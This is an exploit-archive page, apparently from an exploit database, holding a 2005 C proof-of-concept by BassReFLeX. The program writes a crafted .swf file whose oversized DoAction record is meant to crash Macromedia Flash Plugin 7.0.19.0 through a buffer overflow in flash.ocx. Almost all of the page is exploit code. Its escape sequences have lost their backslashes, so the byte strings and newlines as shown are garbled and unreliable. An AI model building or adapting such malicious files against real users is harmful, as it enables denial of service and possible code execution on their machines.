[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit
# Published : 2005-11-18
# Author : BassReFLeX
# Previous Title : FileZilla Server Terminal 0.9.4d Buffer Overflow PoC
# Next Title : FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
/*
* ********************************************************* *
* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *
* ********************************************************* *
* Version: v7.0.19.0 *
* PoC coded by: BassReFLeX *
* Date: 11 Oct 2005 *
* ********************************************************* *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";
//[SetBackgroundColor]
char SetBackgroundColor[] = "x43x02xffx00x00";
//[DoAction] 1 pwn j00r 455!
char DoAction[] = "x3cx03x9bx08x00x41x41x41x41x41x41x41x41x00x40x00"
"x42x42x42x42x42x42x42x42x00x43x43x43x43x43x43x43"
"x43x00x44x44x44x44x44x44x44x44x00x45x45x45x45x45"
"x45x45x45x00x46x46x46x46x46x46x46x46x00x00";
//[ShowFrame]
char ShowFrame[] = "x40x00";
//[End]
char End[] = "x00x00";
int main(int argc,char* argv[])
{
system("cls");
printf("n* ********************************************************* *");
printf("n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *");
printf("n* ********************************************************* *");
printf("n* Version: v7.0.19.0 *");
printf("n* Date: 11 Oct 2005 *");
printf("n* ProofOfConcept(POC) coded by: BassReFLeX *");
printf("n* ********************************************************* *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("nFile couldn't open!");
exit(1);
}
printf("nnWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("nFile created successfully!");
printf("nFilename: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("nn");
printf("n%s <Filename>",file);
printf("nnFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
// www.Syue.com [2005-11-18]